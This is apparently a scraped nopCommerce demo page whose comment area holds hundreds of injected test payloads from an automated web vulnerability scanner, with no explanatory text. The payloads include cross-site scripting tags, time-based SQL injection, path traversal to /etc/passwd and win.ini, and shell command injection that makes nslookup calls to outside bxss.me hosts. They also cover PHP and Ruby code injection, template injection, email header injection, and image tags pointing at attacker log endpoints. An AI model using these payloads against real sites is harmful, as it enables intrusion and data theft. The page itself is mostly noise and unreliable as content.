About nopCommerce
Monday, April 22, 2024
For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
Leave your comment
This is a sample comment...
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
response.write(9883998*9179555)
99yWLC5W
'+response.write(9883998*9179555)+'
555
555
"+response.write(9883998*9179555)+"
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
'"
../555
<!--
echo zyhhpu$()\ esfcpg\nz^xyu||a #' &echo zyhhpu$()\ esfcpg\nz^xyu||a #|" &echo zyhhpu$()\ esfcpg\nz^xyu||a #
555
&echo xeumeo$()\ jpmcny\nz^xyu||a #' &echo xeumeo$()\ jpmcny\nz^xyu||a #|" &echo xeumeo$()\ jpmcny\nz^xyu||a #
555
555
555
|echo ucdhnz$()\ bjwfbw\nz^xyu||a #' |echo ucdhnz$()\ bjwfbw\nz^xyu||a #|" |echo ucdhnz$()\ bjwfbw\nz^xyu||a #
555
555
555
(nslookup hitlsugkuikbhe04b8.bxss.me||perl -e "gethostbyname('hitlsugkuikbhe04b8.bxss.me')")
555
555
$(nslookup hitbuqymnauljdf1b0.bxss.me||perl -e "gethostbyname('hitbuqymnauljdf1b0.bxss.me')")
555
&(nslookup hitoxyxnkjdnh90ac6.bxss.me||perl -e "gethostbyname('hitoxyxnkjdnh90ac6.bxss.me')")&'\"`0&(nslookup hitoxyxnkjdnh90ac6.bxss.me||perl -e "gethostbyname('hitoxyxnkjdnh90ac6.bxss.me')")&`'
|(nslookup hitsoxkkkqmjt21443.bxss.me||perl -e "gethostbyname('hitsoxkkkqmjt21443.bxss.me')")
555
555
555
555
`(nslookup hitdbrqycfguv4adda.bxss.me||perl -e "gethostbyname('hitdbrqycfguv4adda.bxss.me')")`
;(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")|(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")&(nslookup hitljmqdtmjae02ca8.bxss.me||perl -e "gethostbyname('hitljmqdtmjae02ca8.bxss.me')")
555
555
555
555
555
555&n972643=v995064
555
555
555
555
555
555
555
555
/xfs.bxss.me
555
bcc:009247.80505-82180.80505.f9d9f.19871.2@bxss.me
555
555'"()&%<acx><ScRiPt >pJPa(9998)</ScRiPt>
to@example.com>
bcc:009247.80505-82181.80505.f9d9f.19871.2@bxss.me
555
555
555
555
555
'"()&%<acx><ScRiPt >pJPa(9425)</ScRiPt>
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
5559868679
555
${10000079+9999022}
555
555
acu4233<s1﹥s2ʺs3ʹuca4233
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
)
acux4532%C0%BEz1%C0%BCz2a%90bcxuca4532
Http://bxss.me/t/fit.txt
HttP://bxss.me/t/xss.html?%00
http://bxss.me/t/fit.txt?.jpg
bxss.me/t/xss.html?%00
555
!(()&&!|*|*|
bxss.me
555
^(#$!@#$)(()))******
<%={{={@{#{${acx}}%>
555
555
"+"A".concat(70-3).concat(22*4).concat(110).concat(72).concat(118).concat(77)+(require"socket"
Socket.gethostbyname("hitsf"+"tjwywrbl06026.bxss.me.")[3].to_s)+"
555
555
'+'A'.concat(70-3).concat(22*4).concat(98).concat(87).concat(105).concat(75)+(require'socket'
Socket.gethostbyname('hitof'+'mczdfhat94462.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
<th:t="${acx}#foreach
555
555
555
555
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555
555
555
555
NewsCommentAdd
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
NewsCommentAdd/.
1CKbatZF3xO
acx{{98991*97996}}xca
555
555
555
555
555
555
'.gethostbyname(lc('hitzo'.'tnivqwho80e6a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(85).chr(103).chr(84).'
555
555
555
".gethostbyname(lc("hityg"."jmowhnjyf00de.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(70).chr(99).chr(76)."
acx[[${98991*97996}]]xca
'"()
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
';print(md5(31337));$a='
acx__${98991*97996}__::.x
";print(md5(31337));$a="
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555<ScRiPt >pJPa(9771)</ScRiPt>
555
555
555
555
555<WDJKNW>P4JOT[!+!]</WDJKNW>
555<script>pJPa(9991)</script>
555
555
555
555<ScR<ScRiPt>IpT>pJPa(9924)</sCr<ScRiPt>IpT>
555
555
555
555<ScRiPt
>pJPa(9186)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9691></ScRiPt>
555<isindex type=image src=1 onerror=pJPa(9691)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9630'>
555<body onload=pJPa(9516)>
555<img src=//xss.bxss.me/t/dot.gif onload=pJPa(9491)>
555<img src=xyz OnErRor=pJPa(9959)>
555<img/src=">" onerror=alert(9062)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%70%4A%50%61%289179%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\pJPa(9325)\u003C/sCripT\u003E
555<ScRiPt>pJPa(9592)</sCripT>
%F6<img acu onmouseover=pJPa(95001) //%F6>
555<input autofocus onfocus=pJPa(9499)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(pJPa(9485))}
555piQvz
<ScRiPt >pJPa(9154)</ScRiPt>
555<W6U6EH>0CPCM[!+!]</W6U6EH>
555<ifRAme sRc=9756.com></IfRamE>
555<aWXi1Gu x=9750>
555<img sRc='http://attacker-9766/log.php?
555<adg6DiZ<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+462-462-1=0+0+0+1 --
-1 OR 2+642-642-1=0+0+0+1
-1' OR 2+282-282-1=0+0+0+1 --
-1' OR 2+463-463-1=0+0+0+1 or 'dymBRSSC'='
-1" OR 2+427-427-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
HdykLGdr'; waitfor delay '0:0:15' --
XezYeDT7'); waitfor delay '0:0:15' --
4A7YvlaE')); waitfor delay '0:0:15' --
-5 OR 611=(SELECT 611 FROM PG_SLEEP(15))--
-5) OR 20=(SELECT 20 FROM PG_SLEEP(15))--
-1)) OR 971=(SELECT 971 FROM PG_SLEEP(15))--
3Frk2dUK' OR 80=(SELECT 80 FROM PG_SLEEP(15))--
FSGsQGf7') OR 31=(SELECT 31 FROM PG_SLEEP(15))--
opFwqToO')) OR 196=(SELECT 196 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@ce6S9
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1clRkMEEO
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
response.write(9475055*9930629)
555
'+response.write(9475055*9930629)+'
555
555
"+response.write(9475055*9930629)+"
CIgRJ4QY
555
555
555
555
555
555
echo whltqb$()\ kuwnqb\nz^xyu||a #' &echo whltqb$()\ kuwnqb\nz^xyu||a #|" &echo whltqb$()\ kuwnqb\nz^xyu||a #
555
bcc:009247.6274-1981.6274.28770.20044.2@bxss.me
555
&echo xyvitr$()\ txjelt\nz^xyu||a #' &echo xyvitr$()\ txjelt\nz^xyu||a #|" &echo xyvitr$()\ txjelt\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
1
|echo obkzmn$()\ mgquke\nz^xyu||a #' |echo obkzmn$()\ mgquke\nz^xyu||a #|" |echo obkzmn$()\ mgquke\nz^xyu||a #
to@example.com>
bcc:009247.6274-1985.6274.28770.20044.2@bxss.me
1
555
(nslookup hitvtcgufaqzdd74de.bxss.me||perl -e "gethostbyname('hitvtcgufaqzdd74de.bxss.me')")
555
../../../../../../../../../../../../../../windows/win.ini
$(nslookup hitgxnlsxskde4f96e.bxss.me||perl -e "gethostbyname('hitgxnlsxskde4f96e.bxss.me')")
555
555
555
&(nslookup hitilldaccoouc37fd.bxss.me||perl -e "gethostbyname('hitilldaccoouc37fd.bxss.me')")&'\"`0&(nslookup hitilldaccoouc37fd.bxss.me||perl -e "gethostbyname('hitilldaccoouc37fd.bxss.me')")&`'
555
|(nslookup hitjlydojueia92f6a.bxss.me||perl -e "gethostbyname('hitjlydojueia92f6a.bxss.me')")
../555
555<esi:include src="http://bxss.me/rpb.png"/>
`(nslookup hitcpjoyisvva44344.bxss.me||perl -e "gethostbyname('hitcpjoyisvva44344.bxss.me')")`
555
555
;(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")|(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")&(nslookup hitntcyjibqck1ddf3.bxss.me||perl -e "gethostbyname('hitntcyjibqck1ddf3.bxss.me')")
555
555
555
555
555
555
555
${10000457+9999239}
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n979803=v912721
)
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
555
!(()&&!|*|*|
555
-1 OR 2+738-738-1=0+0+0+1 --
^(#$!@#$)(()))******
555
555
-1 OR 2+950-950-1=0+0+0+1
555
555
Http://bxss.me/t/fit.txt
555
-1' OR 2+289-289-1=0+0+0+1 --
555
http://bxss.me/t/fit.txt?.jpg
-1' OR 2+387-387-1=0+0+0+1 or 'vUEj2D1N'='
/etc/shells
c:/windows/win.ini
-1" OR 2+176-176-1=0+0+0+1 --
bxss.me
555
if(now()=sysdate(),sleep(15),0)
'"()
'.gethostbyname(lc('hityt'.'huhgxcpmb9e13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(66).chr(121).chr(70).'
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
".gethostbyname(lc("hitta"."uisdwlro1da39.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(73).chr(98).chr(89)."
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
-1; waitfor delay '0:0:15' --
555
555
555
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
555
1 waitfor delay '0:0:15' --
555
555
jRBBRl1v'; waitfor delay '0:0:15' --
555
555
555
mPslOgeQ'); waitfor delay '0:0:15' --
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
pLss9GDn')); waitfor delay '0:0:15' --
555
555
-5 OR 460=(SELECT 460 FROM PG_SLEEP(15))--
555
';print(md5(31337));$a='
-5) OR 884=(SELECT 884 FROM PG_SLEEP(15))--
HttP://bxss.me/t/xss.html?%00
555
-1)) OR 949=(SELECT 949 FROM PG_SLEEP(15))--
";print(md5(31337));$a="
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(111).concat(72).concat(110).concat(74)+(require"socket"
Socket.gethostbyname("hitck"+"nnpeyfkv70f3c.bxss.me.")[3].to_s)+"
otzPjO8d' OR 588=(SELECT 588 FROM PG_SLEEP(15))--
'+'A'.concat(70-3).concat(22*4).concat(98).concat(70).concat(104).concat(71)+(require'socket'
Socket.gethostbyname('hitdb'+'zmbnarxre9cba.bxss.me.')[3].to_s)+'
555
${@print(md5(31337))}
555
ettTdUx6') OR 283=(SELECT 283 FROM PG_SLEEP(15))--
555
${@print(md5(31337))}\
555
7kg85Oxr')) OR 305=(SELECT 305 FROM PG_SLEEP(15))--
'.print(md5(31337)).'
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
555
555
555
555
NewsCommentAdd
555
555
555
555
555
NewsCommentAdd/.
@@nLRqm
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
/xfs.bxss.me
555
555
555
555
555
'"
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<acx><ScRiPt >H1Jo(9014)</ScRiPt>
555
555
'"()&%<acx><ScRiPt >H1Jo(9560)</ScRiPt>
555
555
555
5559484580
555
acu2787<s1﹥s2ʺs3ʹuca2787
555
555
acux2436%C0%BEz1%C0%BCz2a%90bcxuca2436
555
555
<%={{={@{#{${acx}}%>
555
555
<th:t="${acx}#foreach
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >H1Jo(9646)</ScRiPt>
555<WQXNDD>TRRPK[!+!]</WQXNDD>
555<script>H1Jo(9475)</script>
555<ScR<ScRiPt>IpT>H1Jo(9070)</sCr<ScRiPt>IpT>
555<ScRiPt
>H1Jo(9961)</ScRiPt>
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9440></ScRiPt>
555<isindex type=image src=1 onerror=H1Jo(9269)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9240'>
555<body onload=H1Jo(9616)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=H1Jo(9461)>
555
555
555<img src=xyz OnErRor=H1Jo(9062)>
555
555
555
555<img/src=">" onerror=alert(9510)>
555
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%48%31%4A%6F%289562%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\H1Jo(9154)\u003C/sCripT\u003E
555
555<ScRiPt>H1Jo(9463)</sCripT>
555
%F6<img acu onmouseover=H1Jo(93761) //%F6>
555
555<input autofocus onfocus=H1Jo(9303)>
555
555
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555
555}body{acu:Expre/**/SSion(H1Jo(9866))}
555
555878Sd
<ScRiPt >H1Jo(9748)</ScRiPt>
555
555<WK7R4E>SW7QX[!+!]</WK7R4E>
555
555<ifRAme sRc=9585.com></IfRamE>
555
555<aGERaKZ x=9086>
555
555<img sRc='http://attacker-9470/log.php?
555<alCwiWK<
555
555
555
555
555
555
555
555
555
1
555
1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
1
555
555'"()&%<acx><ScRiPt >O2EW(9660)</ScRiPt>
555
555
'"()&%<acx><ScRiPt >O2EW(9206)</ScRiPt>
555
555
555
5559651473
555
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
1
555
1
acu8492<s1﹥s2ʺs3ʹuca8492
555
1
response.write(9840564*9649978)
555
'+response.write(9840564*9649978)+'
555
acux9927%C0%BEz1%C0%BCz2a%90bcxuca9927
555
"+response.write(9840564*9649978)+"
1
555
555
1
1
1
555
1
1
555
<%={{={@{#{${acx}}%>
1
wP5sFzPx
1
1
555
<th:t="${acx}#foreach
1
555
1
echo ajtbth$()\ totlpu\nz^xyu||a #' &echo ajtbth$()\ totlpu\nz^xyu||a #|" &echo ajtbth$()\ totlpu\nz^xyu||a #
1
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
&echo vczxym$()\ jtblmt\nz^xyu||a #' &echo vczxym$()\ jtblmt\nz^xyu||a #|" &echo vczxym$()\ jtblmt\nz^xyu||a #
|echo bitlqa$()\ wwdqmt\nz^xyu||a #' |echo bitlqa$()\ wwdqmt\nz^xyu||a #|" |echo bitlqa$()\ wwdqmt\nz^xyu||a #
1
555
555
../../../../../../../../../../../../../../etc/passwd
(nslookup hitmsbqkuaduod878d.bxss.me||perl -e "gethostbyname('hitmsbqkuaduod878d.bxss.me')")
acx{{98991*97996}}xca
../../../../../../../../../../../../../../windows/win.ini
$(nslookup hitgvkhqhyilne4e53.bxss.me||perl -e "gethostbyname('hitgvkhqhyilne4e53.bxss.me')")
&(nslookup hitdlhydzxrcwe2757.bxss.me||perl -e "gethostbyname('hitdlhydzxrcwe2757.bxss.me')")&'\"`0&(nslookup hitdlhydzxrcwe2757.bxss.me||perl -e "gethostbyname('hitdlhydzxrcwe2757.bxss.me')")&`'
555
|(nslookup hititoxptdaur3b591.bxss.me||perl -e "gethostbyname('hititoxptdaur3b591.bxss.me')")
1
1
../1
acx[[${98991*97996}]]xca
`(nslookup hitezdeaukdze7805d.bxss.me||perl -e "gethostbyname('hitezdeaukdze7805d.bxss.me')")`
1
;(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")|(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")&(nslookup hitamrzyefxucfc005.bxss.me||perl -e "gethostbyname('hitamrzyefxucfc005.bxss.me')")
1%0abcc:009247.6274-2479.6274.7276b.20044.2@bxss.me
to@example.com>%0d%0abcc:009247.6274-2480.6274.7276b.20044.2@bxss.me
555
1
acx__${98991*97996}__::.x
1
1<esi:include src="http://bxss.me/rpb.png"/>
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
1
${9999233+9999891}
555
555<ScRiPt >O2EW(9105)</ScRiPt>
1
1
1
1&n957445=v994643
555<WYPWH0>GINEL[!+!]</WYPWH0>
1
555
1
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
1
1
555
1
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
1
555
Http://bxss.me/t/fit.txt
555<script>O2EW(9961)</script>
http://bxss.me/t/fit.txt%3F.jpg
1
/etc/shells
c:/windows/win.ini
555
555<ScR<ScRiPt>IpT>O2EW(9756)</sCr<ScRiPt>IpT>
1
1
bxss.me
1
555<ScRiPt
>O2EW(9047)</ScRiPt>
555
1
1
1
1
555
1
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9009></ScRiPt>
1
1
555
1
555<isindex type=image src=1 onerror=O2EW(9963)>
555
1
1
1
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9201'>
555
1
555<body onload=O2EW(9855)>
555
1
555<img src=//xss.bxss.me/t/dot.gif onload=O2EW(9877)>
555
1
555
1
555<img src=xyz OnErRor=O2EW(9794)>
1
1
555
1
555<img/src=">" onerror=alert(9643)>
1
555
1
%35%35%35%3C%53%63%52%69%50%74%20%3E%4F%32%45%57%289185%29%3C%2F%73%43%72%69%70%54%3E
555
1
-1 OR 2+675-675-1=0+0+0+1 --
555\u003CScRiPt\O2EW(9809)\u003C/sCripT\u003E
-1 OR 2+632-632-1=0+0+0+1
-1' OR 2+209-209-1=0+0+0+1 --
555
-1' OR 2+959-959-1=0+0+0+1 or '7GgYMdXh'='
-1" OR 2+761-761-1=0+0+0+1 --
555<ScRiPt>O2EW(9452)</sCripT>
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
%F6<img acu onmouseover=O2EW(94181) //%F6>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555<input autofocus onfocus=O2EW(9207)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
<a HrEF=http://xss.bxss.me></a>
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
<a HrEF=jaVaScRiPT:>
1 waitfor delay '0:0:15' --
555
1
555}body{acu:Expre/**/SSion(O2EW(9534))}
zCGOZ2gn'; waitfor delay '0:0:15' --
NEqwyXKJ'); waitfor delay '0:0:15' --
1
1
1
1
555
'.gethostbyname(lc('hitgq'.'unnaiwtx6371b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(70).chr(100).chr(81).'
)
555ASfoi
<ScRiPt >O2EW(9205)</ScRiPt>
!(()&&!|*|*|
".gethostbyname(lc("hitfr"."vuaecpksd42b5.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(66).chr(106).chr(79)."
^(#$!@#$)(()))******
555
mWIi9k5c')); waitfor delay '0:0:15' --
555<WVKPBR>78NES[!+!]</WVKPBR>
1
-5 OR 116=(SELECT 116 FROM PG_SLEEP(15))--
-5) OR 798=(SELECT 798 FROM PG_SLEEP(15))--
1
1
555
-1)) OR 80=(SELECT 80 FROM PG_SLEEP(15))--
1
1
HttP://bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(114).concat(89).concat(119).concat(87)+(require"socket"
Socket.gethostbyname("hitto"+"ognqhqaq6d6e9.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555<ifRAme sRc=9318.com></IfRamE>
'+'A'.concat(70-3).concat(22*4).concat(117).concat(80).concat(109).concat(72)+(require'socket'
Socket.gethostbyname('hityf'+'bqkodnzke671f.bxss.me.')[3].to_s)+'
555
1
6y1pqOkL' OR 561=(SELECT 561 FROM PG_SLEEP(15))--
1
1
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
ehYb3OBc') OR 640=(SELECT 640 FROM PG_SLEEP(15))--
bD52rgex')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
1
555<aueTxOp x=9458>
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
/xfs.bxss.me
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
1
${@print(md5(31337))}\
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
'.print(md5(31337)).'
1
555<img sRc='http://attacker-9147/log.php?
'"
1'"
1�����%2527%2522
555'"()&%<acx><ScRiPt >tNit(9896)</ScRiPt>
<!--
@@Bw8qZ
1
1
1
'"()&%<acx><ScRiPt >tNit(9321)</ScRiPt>
555<ac3VwzI<
1
1
5559261877
1
1
1
1
1
acu4567<s1﹥s2ʺs3ʹuca4567
1
1
acux10538%C0%BEz1%C0%BCz2a%90bcxuca10538
1
1
<%={{={@{#{${acx}}%>
1
<th:t="${acx}#foreach
1
1
1
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
1
acx{{98991*97996}}xca
1
1
acx[[${98991*97996}]]xca
1
1
acx__${98991*97996}__::.x
1
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
555<ScRiPt >tNit(9604)</ScRiPt>
1
1
1
555<WCFYSY>L1NJH[!+!]</WCFYSY>
1
555<script>tNit(9533)</script>
1
1
555<ScR<ScRiPt>IpT>tNit(9093)</sCr<ScRiPt>IpT>
1
555<ScRiPt
>tNit(9728)</ScRiPt>
1
1
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9148></ScRiPt>
1
555<isindex type=image src=1 onerror=tNit(9077)>
1
1
1
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9167'>
1
1
1
555<body onload=tNit(9076)>
1'"()&%<acx><ScRiPt >vayX(9040)</ScRiPt>
'"()&%<acx><ScRiPt >vayX(9313)</ScRiPt>
555<img src=//xss.bxss.me/t/dot.gif onload=tNit(9177)>
19697956
555<img src=xyz OnErRor=tNit(9623)>
acu1461%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1461
acux9388%C0%BEz1%C0%BCz2a%90bcxuca9388
<%={{={@{#{${acx}}%>
555<img/src=">" onerror=alert(9681)>
1
<th:t="${acx}#foreach
%35%35%35%3C%53%63%52%69%50%74%20%3E%74%4E%69%74%289053%29%3C%2F%73%43%72%69%70%54%3E
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555'"()&%<acx><ScRiPt >AMWP(9796)</ScRiPt>
555\u003CScRiPt\tNit(9928)\u003C/sCripT\u003E
'"()&%<acx><ScRiPt >AMWP(9151)</ScRiPt>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
555<ScRiPt>tNit(9452)</sCripT>
5559649437
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1<ScRiPt >vayX(9877)</ScRiPt>
%F6<img acu onmouseover=tNit(99181) //%F6>
555
1<WIASB2>JA4DD[!+!]</WIASB2>
acu9178<s1﹥s2ʺs3ʹuca9178
1<script>vayX(9276)</script>
555<input autofocus onfocus=tNit(9494)>
acux5927%C0%BEz1%C0%BCz2a%90bcxuca5927
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%76%61%79%58%28%39%39%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
555
<a HrEF=http://xss.bxss.me></a>
1<ScRiPt
>vayX(9405)</ScRiPt>
<%={{={@{#{${acx}}%>
555
<a HrEF=jaVaScRiPT:>
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9056></ScRiPt>
1<�ScRiPt
>vayX(9682)</ScRiPt>
<th:t="${acx}#foreach
555
555}body{acu:Expre/**/SSion(tNit(9541))}
1<svg
��onload=vayX(9169);>
1<isindex type=image src=1 onerror=vayX(9509)>
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9594'>
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
555sSnAK
<ScRiPt >tNit(9069)</ScRiPt>
555
1<body onload=vayX(9674)>
555
555
1<img src=//xss.bxss.me/t/dot.gif onload=vayX(9238)>
1<img src=xyz OnErRor=vayX(9009)>
555<WGVWLR>Y1EO3[!+!]</WGVWLR>
acx{{98991*97996}}xca
1<img/src=">" onerror=alert(9995)>
555
555
%31%3C%53%63%52%69%50%74%20%3E%76%61%79%58%289159%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\vayX(9510)\u003C/sCripT\u003E
555<ifRAme sRc=9212.com></IfRamE>
555
1<ScRiPt>vayX(9907)</sCripT>
555
555<aEimrKo x=9736>
acx[[${98991*97996}]]xca
555
�<img acu onmouseover=vayX(93341) //�>
555<img sRc='http://attacker-9729/log.php?
1<input autofocus onfocus=vayX(9221)>
555
acx__${98991*97996}__::.x
555
<a HrEF=http://xss.bxss.me></a>
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<a2c03e0<
555
<a HrEF=jaVaScRiPT:>
555
555<ScRiPt >AMWP(9273)</ScRiPt>
555
555
1}body{acu:Expre/**/SSion(vayX(9605))}
1NwEDf
<ScRiPt >vayX(9631)</ScRiPt>
555
1<WUVIOI>A9LVZ[!+!]</WUVIOI>
555<WVQKCJ>BDMVG[!+!]</WVQKCJ>
555
1<ifRAme sRc=9931.com></IfRamE>
1<aiFMUIu x=9110>
555
1<img sRc='http://attacker-9860/log.php?
555<script>AMWP(9706)</script>
555
1<aQCvKay<
555
555
555<ScR<ScRiPt>IpT>AMWP(9548)</sCr<ScRiPt>IpT>
555
555
555
555<ScRiPt
>AMWP(9036)</ScRiPt>
555
555
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9466></ScRiPt>
555
555
555
555
555<isindex type=image src=1 onerror=AMWP(9050)>
555
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9958'>
555
555<body onload=AMWP(9812)>
555
555<img src=//xss.bxss.me/t/dot.gif onload=AMWP(9393)>
555
555
555<img src=xyz OnErRor=AMWP(9321)>
555<img/src=">" onerror=alert(9114)>
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%41%4D%57%50%289314%29%3C%2F%73%43%72%69%70%54%3E
555
555\u003CScRiPt\AMWP(9000)\u003C/sCripT\u003E
555
555
555<ScRiPt>AMWP(9718)</sCripT>
555
555
%F6<img acu onmouseover=AMWP(95211) //%F6>
555
555
555
555
555<input autofocus onfocus=AMWP(9414)>
555
555
<a HrEF=http://xss.bxss.me></a>
555
555
<a HrEF=jaVaScRiPT:>
555
555
555
555}body{acu:Expre/**/SSion(AMWP(9865))}
555
555
55533mfb
<ScRiPt >AMWP(9717)</ScRiPt>
555
555
555<WTNCAM>ZDP2G[!+!]</WTNCAM>
555
555
